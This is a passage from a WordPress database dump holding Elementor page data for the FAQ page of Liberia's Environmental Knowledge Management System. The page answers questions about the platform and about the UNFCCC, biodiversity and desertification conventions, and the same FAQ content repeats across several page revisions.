resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(16849,2526,'_wp_page_template','default'),(16850,2526,'_elementor_edit_mode','builder'),(16851,2526,'_elementor_template_type','wp-page'),(16852,2526,'_elementor_version','2.7.5'),(16853,2526,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implementation in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"How can i discussion on topics?\",\"tab_content\":\"<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.<\\/p>\",\"_id\":\"bc9c821\"},{\"tab_title\":\"How can i find knowledge resources on the EKMS?\",\"tab_content\":\"<p>Use the smart search feature on the homepage to search for keywords or better still select a category.<\\/p>\",\"_id\":\"39dd408\"}],\"icon_color\":\"#000000\",\"content_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in Those\\u00a0Countries\\u00a0Experiencing Serious Drought and\\/or\\u00a0Desertification, Particularly in Africa (UNCCD) is a\\u00a0Convention to combat desertification\\u00a0and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by\\u00a0<span style=\\\"color: #222222; font-family: georgia, palatino, serif; font-size: 16px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;\\\">international cooperation and partnership arrangements.<\\/span><\\/p>\",\"_id\":\"9661246\"},{\"tab_title\":\"Is the UNCCD legally binding?\",\"tab_content\":\"<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management<\\/p>\",\"_id\":\"da9b208\"},{\"tab_title\":\"What is desertification?\",\"tab_content\":\"<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.<\\/p>\",\"_id\":\"c71b5f6\"},{\"tab_title\":\"Why is it important to combat desertification?\",\"tab_content\":\"<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land\'s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined - are at risk of being displaced as a consequence of desertification.<\\/p>\",\"_id\":\"1275d06\"},{\"tab_title\":\"Is desertification a global problem?\",\"tab_content\":\"<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth\'s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world\'s poorest in over one hundred countries are threatened.<\\/p>\",\"_id\":\"0f255fe\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false}]'),(16855,2527,'_wp_page_template','default'),(16856,2527,'_elementor_edit_mode','builder'),(16857,2527,'_elementor_template_type','wp-page'),(16858,2527,'_elementor_version','2.7.5'),(16859,2527,'_elementor_data','[{\"id\":\"81604c0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"635073e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"20a0238\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"heading_color\":\"#196819\",\"color_text\":\"#000000\",\"color_link_hover\":\"#114511\"},\"elements\":[{\"id\":\"3b455ed\",\"elType\":\"widget\",\"settings\":{\"title\":\"GENERAL \",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c396810\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the EKMS?\",\"tab_content\":\"<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other\\u00a0 Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.<\\/p><p>It focuses on how the Rio conventions are being implementation in Liberia.<\\/p>\",\"_id\":\"eb92a21\"},{\"tab_title\":\"Who can contribute to the EKMS?\",\"tab_content\":\"<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.<\\/p>\",\"_id\":\"044d49e\"},{\"tab_title\":\"How can i discussion on topics?\",\"tab_content\":\"<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.<\\/p>\",\"_id\":\"bc9c821\"},{\"tab_title\":\"How can i find knowledge resources on the EKMS?\",\"tab_content\":\"<p>Use the smart search feature on the homepage to search for keywords or better still select a category.<\\/p>\",\"_id\":\"39dd408\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49d848d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"396f528\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"30a8e68\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d1091e\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNFCCC\",\"title_color\":\"#126b37\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2aefce2\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"When should I accredit myself for UNFCCC meetings?\",\"tab_content\":\"<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.<\\/p>\",\"_id\":\"a4d8544\"},{\"tab_title\":\"I want to get graphs and data about climate change. What is available and can I use it?\",\"tab_content\":\"<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.<\\/p>\",\"_id\":\"3148a01\"},{\"tab_title\":\"Are UNFCCC meetings open to the general public?\",\"tab_content\":\"<p>No, each participant must be properly accredited and registered.<\\/p>\",\"_id\":\"872f5c5\"},{\"tab_title\":\"Who can participate in UNFCCC meetings and how do they accredit themselves?\",\"tab_content\":\"<p>There are different participation groups at UNFCCC meetings; these include:<\\/p><ol><li><p><strong>Government delegate<\\/strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and\\/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/parties_observers\\/parties\\/national_focal_points\\/items\\/9336.php\\\">National Focal Point<\\/a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.<\\/p><\\/li><li><p><strong>Observers<\\/strong>\\u00a0from admitted\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-ngos\\\" target=\\\"_self\\\">non-governmental<\\/a>\\u00a0or\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/admitted-igos\\\" target=\\\"_self\\\">intergovernmental<\\/a>\\u00a0organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the\\u00a0<a href=\\\"https:\\/\\/onlinereg.unfccc.int\\/\\\">online registration system<\\/a>\\u00a0(ORS). Please see the\\u00a0<a href=\\\"https:\\/\\/unfccc.int\\/process-and-meetings\\/parties-non-party-stakeholders\\/non-party-stakeholders\\/overview\\\" target=\\\"_self\\\">civil society<\\/a>\\u00a0web page for more information.<\\/p><\\/li><li><p><strong>Observer<\\/strong>\\u00a0from a United Nations organization or specialized agency. Nominations are received from the respective organization.<\\/p><\\/li><li><p><strong>Member of the press<\\/strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the\\u00a0<a href=\\\"http:\\/\\/unfccc.int\\/press\\/calender_of_events\\/accreditation\\/items\\/2987.php\\\">accreditation section<\\/a>.<\\/p><\\/li><\\/ol>\",\"_id\":\"34ce7e2\"},{\"tab_title\":\"What is the purpose of the UNFCCC?\",\"tab_content\":\"<p>The\\u00a0UN Framework Convention on Climate Change\\u00a0(UNFCCC) is an intergovernmental treaty developed to address the problem of\\u00a0climate change.<\\/p>\",\"_id\":\"5364766\"},{\"tab_title\":\"What is climate neutrality?\",\"tab_content\":\"<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth\'s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.<\\/p>\",\"_id\":\"2cf3095\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"034d9e3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f12a46\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"00a6661\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e527259\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCBD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e0f30fd\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the UNCBD?\",\"tab_content\":\"<p>The\\u00a0Convention on Biological Diversity\\u00a0(CBD)\\u00a0is\\u00a0an international legally-binding treaty with three main goals: conservation of\\u00a0biodiversity; sustainable use of\\u00a0biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.<\\/p>\",\"_id\":\"76b731c\"},{\"tab_title\":\"What is conservation of biodiversity?\",\"tab_content\":\"<p>Conservation of biological diversity\\u00a0leads to\\u00a0conservation\\u00a0of essential ecological\\u00a0diversity\\u00a0to preserve the continuity of food chains. The genetic\\u00a0diversity\\u00a0of plants and animals is preserved. Biodiversity conservation\\u00a0serves as an insurance policy for the future.<\\/p>\",\"_id\":\"fc56846\"},{\"tab_title\":\"What is the need of conducting a biodiversity meet?\",\"tab_content\":\"<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.<\\/p>\",\"_id\":\"1c0b9e0\"},{\"tab_title\":\"How can we protect and preserve biodiversity?\",\"tab_content\":\"<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and\\u00a0protect\\u00a0beaches, parks, reserves, and fields where wild plants and animals live.<\\/p>\",\"_id\":\"b0638cd\"},{\"tab_title\":\"What are some factors that affect biodiversity?\",\"tab_content\":\"<p>The loss of\\u00a0biodiversity affects the lives of more than 1 billion people living in dry lands.<br \\/>5 major threats to biodiversity;<br \\/>Climate change<br \\/>Deforestation and habitat loss<br \\/>Over-exploitation<br \\/>Invasive species<br \\/>Pollution<\\/p>\",\"_id\":\"45db245\"}]},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e9a9393\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f33106f\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"81f02fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"971e22b\",\"elType\":\"widget\",\"settings\":{\"title\":\"UNCCD\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fefb411\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"What is the importance of the UNCCD?\",\"tab_content\":\"<p>The\\u00a0United Nations Convention to Combat Desertification\\u00a0in 